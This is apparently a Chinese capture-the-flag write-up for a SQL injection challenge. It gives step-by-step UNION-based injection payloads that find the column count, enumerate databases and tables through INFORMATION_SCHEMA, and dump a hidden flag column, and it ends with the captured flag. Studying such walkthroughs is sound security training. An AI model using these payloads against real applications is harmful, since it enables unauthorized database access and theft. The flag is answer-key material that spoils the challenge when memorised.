考察点:sql注入
1.进入场景,发现search提交方式,考虑sql注入
2.初步探测:' union select 1,2,3 #,返回了3列数据
3.获取数据库名,表名:' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
4.获取secret_table表的字段名,数据类型: ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
5.获取secret_table表内容:' and 0 union select 1,2,fl4g from secret_table#
得到flag:QCTF{sq1_inJec7ion_ezzz}













网友评论